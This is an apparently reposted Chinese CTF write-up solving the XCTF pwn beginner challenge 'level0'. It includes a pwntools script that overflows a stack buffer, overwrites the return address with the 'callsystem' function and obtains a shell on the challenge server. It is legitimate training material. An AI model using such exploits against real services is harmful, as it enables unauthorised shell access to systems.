2. 程式人生 > 其它 >攻防世界PWN簡單題 level0

攻防世界PWN簡單題 level0

阿新 發佈:2021-08-24

攻防世界PWN簡單題 level0

開始考驗棧溢位的相關知識了

Checksec 一下檔案 看看都開了什麼保護 和 是多少位的程式

發現是64位的程式, 扔進IDA64。IDA YYDS。。

進入主函式,通過虛擬碼分析邏輯,找出棧溢位漏洞

找到了棧溢位漏洞,開始尋找攻擊手段。

找到了攻擊手段。簡單題就是如此簡單。找一下callsystem地址,當然也可以直接用pwntools獲取

找到了需要的地址0X400596

開始寫exp攻擊遠端伺服器

 from pwn import *
io = remote ('111.200.241.244',49536)
#連線遠端
elf = ELF('./291721f42a044f50a2aead748d539df0')
#開啟本地程式,如果不想用pwntools獲取callsystem地址,此步可以註釋
payload = b'a'*(0x80+0x8) + p64(elf.symbols['callsystem'])
#構造payload 需要覆蓋0x80個地址+上個ebp地址
#也可p64()中替換成0x0x00400596
io.recvuntil("Hello, World\n")
#接收遠端的返回
io.send(payload)
#傳送payload
io.interactive()
#開始互動,恭喜你獲得了shell去檢視flag吧

丟進環境,執行一下,ls, cat flag。。。

老師!!!交卷!

相關推薦

攻防世界PWN簡單 level0

攻防世界PWN簡單 level0 開始考驗棧溢位的相關知識了 Checksec 一下檔案 看看都開了什麼保護 和 是多少位的程式

攻防世界PWN簡單 level2

攻防世界PWN簡單 level2 此考驗的是對ROP鏈攻擊的基礎 萬事開頭PWN第一步checksec 一下

攻防世界pwn:forgot

0x00:檢視檔案資訊 該檔案是32位的,canary和PIE保護機制沒開。   0x01:用IDA進行靜態分析

攻防世界-pwn-writeup

when_did_you_born題目地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5051&page=1

攻防世界-pwn-int_overflow

是一道整數溢位型別的,我們首先來看一下整數溢位的原理╰(°▽°)╯

攻防世界-pwn-forgot

技術標籤:CTF 簡單題…不過一開始沒找到重點,浪費時間了。開始定義了一大堆沒有用的函式。然後是開始一大堆輸出。給了函式地址,不過因為沒有PIE所以其實不需要… 漏洞點在scanf,明顯的溢位,但是這裡不是這麼

[攻防世界 pwn]——get_shell

技術標籤:# 攻防世界 [攻防世界 pwn]——get_shell 題目地址: https://adworld.xctf.org.cn/題目:

[攻防世界 pwn]——level2

技術標籤:# 攻防世界 [攻防世界 pwn]——level2 題目地址: https://adworld.xctf.org.cn/題目:32位程式IDA中, 找到system和 ‘/bin/sh’ 地址進行覆蓋

pwn攻防世界 pwn新手區wp

pwn攻防世界 pwn新手區wp 前言 這幾天惡補pwn的各種知識點,然後看了看攻防世界pwn新手區沒有堆(堆才剛剛開始看),所以就花了一晚上的時間把新手區的10給寫完了。

攻防世界web基礎知識點彙總

php中有兩種比較符號 === 會同時比較字串的值和型別 == 會先將字串換成相同型別,再作比較,屬於弱型別比較

攻防世界-密碼學-簡單流量分析

1. 題目資訊 題目背景:運維人員在日常安全檢查的時候發現現場某裝置會不時向某不知名ip發出非正常的ICMP PING包。這引起了運維人員的注意,他在過濾出ICMP包分析並馬上開始做應急處理很可能已被攻擊的裝置,附件給出

攻防世界新手

Web–command_execution 題目描述:小寧寫了個ping功能,但沒有寫waf,X老師告訴她這是非常危險的,你知道為什麼嗎。 開啟場景後: 因為是一個執行ping的輸入框,訪問本地(127.0.0.1) 訪問成功後,嘗試獲取

攻防世界 Reverse高手進階區 2分 parallel-comparator-200

技術標籤:ctfreversectf攻防世界 前言 繼續ctf的旅程 攻防世界Reverse高手進階區的2分 本篇是parallel-comparator-200的writeup

攻防世界 新手get_shell

技術標籤:學習過程 get_shell 題目描述: 執行就能拿到shell呢,真的 解題: 事實就像題目描述那樣,執行就能拿到flag ida檢視直接就呼叫/bin/sh

攻防世界 Crypto高手進階區 3分 wtc_rsa_bbq

技術標籤:ctfctf攻防世界cryptorsa 前言 繼續ctf的旅程 攻防世界Crypto高手進階區的3分 本篇是wtc_rsa_bbq的writeup

攻防世界 Crypto高手進階區 3分 streamgame1

技術標籤:ctfctf攻防世界crypto 前言 繼續ctf的旅程 攻防世界Crypto高手進階區的3分 本篇是streamgame1的writeup

攻防世界 Crypto高手進階區 4分 streamgame2

技術標籤:ctfctf攻防世界crypto 前言 繼續ctf的旅程 攻防世界Crypto高手進階區的4分 本篇是streamgame2的writeup

攻防世界Web篇前五解析

第一 進入以後我們發現右鍵檢視原始碼被禁用了,這時候有兩種解決方法。

攻防世界 Crypto高手進階區 4分 safer-than-rot13

技術標籤:ctfctf攻防世界crypto詞頻分析 前言 繼續ctf的旅程 攻防世界Crypto高手進階區的4分 本篇是safer-than-rot13的writeup

攻防世界 Crypto高手進階區 4分 RSA256

技術標籤:ctfrsa攻防世界ctfcrypto 前言 繼續ctf的旅程 攻防世界Crypto高手進階區的4分 本篇是RSA256的writeup